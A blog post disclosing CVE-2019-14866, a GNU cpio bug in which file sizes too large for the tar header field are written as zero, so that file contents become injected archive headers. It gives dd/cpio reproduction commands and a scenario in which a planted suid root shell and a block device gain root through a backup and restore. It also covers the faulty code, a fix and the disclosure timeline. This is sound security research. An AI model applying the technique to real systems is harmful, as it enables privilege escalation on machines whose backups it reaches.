I found a security bug in GNU cpio and thought I’d write down the story of that. It’s not the most interesting bug in the world, but it may still be an interesting story to some.

An odd limit

The whole thing started with me looking at the manpage:

-H, --format=FORMAT
  Use given archive FORMAT. Valid formats are (the number in
  parentheses gives maximum size for individual archive member):
  bin    The obsolete binary format. (2147483647 bytes)
  odc    The old (POSIX.1) portable format. (8589934591 bytes)
  newc   The new (SVR4) portable format, which supports file
         systems having more than 65536 i-nodes. (4294967295 bytes)
  crc    The new (SVR4) portable format with a checksum added.
  tar    The old tar format. (8589934591 bytes)
  ustar  The POSIX.1 tar format. Also recognizes GNU tar archives, which are
         similar but not identical. (8589934591 bytes)
  hpbin  The obsolete binary format used by HPUX's cpio (which stores device
         files differently).
  hpodc  The portable format used by HPUX's cpio (which stores device files

What’s wrong with this picture? Those are some very odd size limits. 2GiB and 4GiB I understand, as those are the limits of 32-bit signed and unsigned ints. But tar having a max size of 8GiB? 33 bits? That doesn’t make any sense.

I was lucky to find this, because some versions of the manpage don’t have this info. E.g. this and this.

Turns out the tar header format stores the file size in 12 bytes, as a string in octal! There are variants and extensions, but long story short that’s the common limit.
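The 8589934591 in the manpage falls out of that field width. Assuming the 12 bytes hold 11 octal digits plus a terminating NUL, the largest representable size is 8^11 - 1. A minimal sketch of that arithmetic (the function name `max_octal_field_value` is made up for illustration, it is not from cpio):

```c
#include <assert.h>
#include <stdint.h>

/* Largest value that fits in a NUL-terminated octal text field that is
 * `field_bytes` wide: one byte goes to the terminator, and each of the
 * remaining bytes holds one octal digit (3 bits). */
uint64_t max_octal_field_value(unsigned field_bytes)
{
    /* Keep the shift below 64 bits. */
    assert(field_bytes >= 2 && field_bytes <= 22);
    unsigned digits = field_bytes - 1;
    return (UINT64_C(1) << (3 * digits)) - 1;
}
```

For a 12-byte field this gives 8589934591, which is 2^33 - 1. That is where the "33 bits" come from.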

That’s… terrible. But it’s a format from the stone age, so maybe it can be forgiven.

I wonder what happens if you exceed that limit… oh… oh no

$ dd if=/dev/zero seek=16G bs=1 count=0 of=testfile.dat
$ echo testfile.dat | cpio -H tar -o | tar tf -
-rw-r--r-- 1000/1000         0 2019-11-07 13:04 testfile.dat
                          ^^^^\--- That's the size according to tar.
$ echo testfile.dat | cpio -H tar -o | wc -c
                          ^^^^^^^^^^^\-- That's the total size of the tar file.

oh no. The tar format is a series of “hey, here comes a file named X, that’s Y bytes long, after those Y bytes I’ll tell you about the next file”.

I’ve generated a tar file that says “hey, here comes a file named testfile.dat that’s 0 bytes long. After those 0 bytes comes another file header.”
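To make the "header, then Y bytes, then next header" walk concrete, here is a rough sketch of how a reader steps through an archive. It assumes the classic layout of 512-byte blocks with the size stored as octal text at offset 124, and it simplifies heavily: it treats an empty name as end of archive and skips checksum verification. The names `parse_octal` and `count_tar_members` are hypothetical, not taken from tar or cpio.

```c
#include <stddef.h>
#include <stdint.h>

#define TAR_BLOCK       512
#define TAR_SIZE_OFFSET 124  /* size field: 12 bytes of octal text */
#define TAR_SIZE_LEN    12

/* Parse an octal text field, stopping at the first non-octal byte. */
static uint64_t parse_octal(const unsigned char *p, size_t len)
{
    uint64_t v = 0;
    size_t i = 0;
    while (i < len && p[i] == ' ')  /* skip leading spaces */
        i++;
    for (; i < len && p[i] >= '0' && p[i] <= '7'; i++)
        v = v * 8 + (uint64_t)(p[i] - '0');
    return v;
}

/* Count the member headers a reader would see in `buf`, trusting each
 * header's size field to locate the next header. */
size_t count_tar_members(const unsigned char *buf, size_t len)
{
    size_t off = 0, members = 0;
    while (off + TAR_BLOCK <= len) {
        if (buf[off] == '\0')  /* simplification: empty name ends the archive */
            break;
        uint64_t size = parse_octal(buf + off + TAR_SIZE_OFFSET, TAR_SIZE_LEN);
        uint64_t data_blocks = (size + TAR_BLOCK - 1) / TAR_BLOCK;
        members++;
        /* Stop if the claimed data would run past the end of the buffer. */
        if (data_blocks > (len - off - TAR_BLOCK) / TAR_BLOCK)
            break;
        off += TAR_BLOCK * (size_t)(1 + data_blocks);
    }
    return members;
}
```

If the first header claims a size of 0, the very next block is parsed as a header, so whatever the file contained gets interpreted as archive metadata. With an honest size, the same block would be skipped as data.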

This means I can make cpio read data (the contents of a file it reads), and write it as if it’s metadata (a tar header):

$ tar cf suffix.tar AUTHORS                            # Create some payload.
$ dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar  # Pad it to "look like" 0 bytes.
$ echo suffix.tar | cpio -H tar -o | tar tvf -         # Feed it to cpio.
    -rw-r--r-- 1000/1000       0 2019-08-30 16:40 suffix.tar
    -rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS

The point here is that cpio was fed one file (suffix.tar) to put into the tar file, but it put two files in there. cpio never read AUTHORS, and it should not be listed.

But so what?

The above is obviously wrong, but how is it a security issue?

It’s a security issue because it’s not just the contents of the injected files that can have arbitrary content, but also the type of file, owner, and suid bits.

I could prepare a payload tar file that contains a suid root shell, and a /dev/sda block device.

evil$ # 1) Prep payload
evil$ ./generate_evil_data --out /home/evil/foo.tar

root# # 2) root user performs backup
root# find /home -print0 | cpio -0 -H tar -o > /var/backup/h.tar

root# # 3) root user restores
root# cd /
root# tar xf /var/backup/h.tar /home/evil/

evil$ # 4) evil user uses newly created rootshell, or writes to /dev/sda
evil$ ls -l /home/evil/
srwxr-xr-x 1 evil evil 61176 Aug  3  2018 /home/evil/rootshell
brw-rw---- 1 evil evil  8, 0 Oct  7 11:21 /home/evil/sda-pwned
evil$ /home/evil/rootshell
# id
uid=0(root) gid=0(root) groups=0(root)
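What makes the restore step dangerous is that every injected header carries its own mode and type fields. A small sketch of a check for the two cases above, assuming the ustar layout (mode as octal text at offset 100, a one-byte type flag at offset 156, with '3' and '4' meaning character and block device). The function name `tar_header_is_dangerous` is hypothetical; no such check exists in cpio or tar as far as this post is concerned.

```c
#include <stdbool.h>
#include <stdlib.h>

#define TAR_MODE_OFFSET     100  /* 8 bytes of octal text */
#define TAR_MODE_LEN        8
#define TAR_TYPEFLAG_OFFSET 156  /* single byte */

/* True if a 512-byte tar header describes a setuid/setgid file or a
 * device node, i.e. something a restore as root should be wary of. */
bool tar_header_is_dangerous(const unsigned char *hdr)
{
    /* Copy the mode field so it is guaranteed to be NUL-terminated. */
    char mode_text[TAR_MODE_LEN + 1] = {0};
    for (int i = 0; i < TAR_MODE_LEN; i++)
        mode_text[i] = (char)hdr[TAR_MODE_OFFSET + i];

    unsigned long mode = strtoul(mode_text, NULL, 8);
    char type = (char)hdr[TAR_TYPEFLAG_OFFSET];

    bool setid  = (mode & 06000) != 0;           /* setuid or setgid bit */
    bool device = (type == '3' || type == '4');  /* char or block device */
    return setid || device;
}
```

Nothing stops the payload from setting any of these fields, since cpio copies the bytes straight through as file contents.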

Finding the code culprit

static void    // [no error checking]
to_oct(long value, […])
  [… write as many as 11 octal ASCII digits, plus NUL byte,
     not checking whether `value` fit …]

void           // [no error checking]
write_out_tar_header (struct cpio_file_stat *file_hdr, int out_des)

write_out_tar_header (file_hdr, out_des); /* FIXME: No error checking */
return 0;    // [0 means success]

That “FIXME” is in the original, and appears to have been there since at least 1994.
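For illustration, here is a sketch of what an octal writer with an overflow check could look like. This is not the actual cpio code and not the patch that was applied; the name `to_oct_checked` and its signature are assumptions made up for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Write `value` as exactly `digits` zero-padded octal characters into
 * `where`, followed by a NUL. `where` must have room for digits + 1
 * bytes. Returns 0 on success, or -1 if `value` needs more than
 * `digits` octal digits (the buffer then holds only the low digits). */
int to_oct_checked(uint64_t value, size_t digits, char *where)
{
    where[digits] = '\0';
    for (size_t i = digits; i > 0; i--) {
        where[i - 1] = (char)('0' + (value & 7));
        value >>= 3;
    }
    /* Leftover bits mean the value did not fit in the field. */
    return value == 0 ? 0 : -1;
}
```

With 11 digits, a 16GiB file (2^34 bytes) leaves "00000000000" in the buffer, because the low 33 bits of 2^34 are all zero. That matches the size of 0 that tar reported earlier. The difference is that this version returns -1, so the caller has a chance to refuse to write the header.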

There may be millions of scripts out there using cpio that are vulnerable.

The tar format is largely to blame here. It’s a “packet in packet” attack which could have been prevented if tar, like many many other formats and protocols, used a regular language (also see this talk).

Well, the tar format and a code bug from like 1994.

So is this only GNU, or more implementations?

OpenBSD, as usual, is fine. I’ve not checked other implementations. But it sure is pushing me from Linux to OpenBSD.


I reported it to the bug-cpio mailing list, being a bit vague and describing it only as “hey, that’s surprising output”, hoping to get the patch in early.

After 10 days with no reply I emailed the Debian package maintainer and the cpio owner directly. No response.

Another week later I started emailing security@debian.org and secalert@redhat.com. Red Hat took 10 days to respond. Debian took 13 days.

It took a bit of back and forth to explain why this was a security issue, but Red Hat eventually created CVE-2019-14866.

On 2019-10-25 the cpio maintainer created a separate patch for the problem. It’s multiple changes in one, which is not great, so for backporting the change to Debian oldstable and oldoldstable the Debian package maintainer chose to go with my minimal patch (with a 32-bit arch fix).

  • Ubuntu (calls this information exposure, but it’s privilege escalation).
  • Debian
  • Red Hat


Oh no, I forgot to give the bug a name, logo, and website. :-(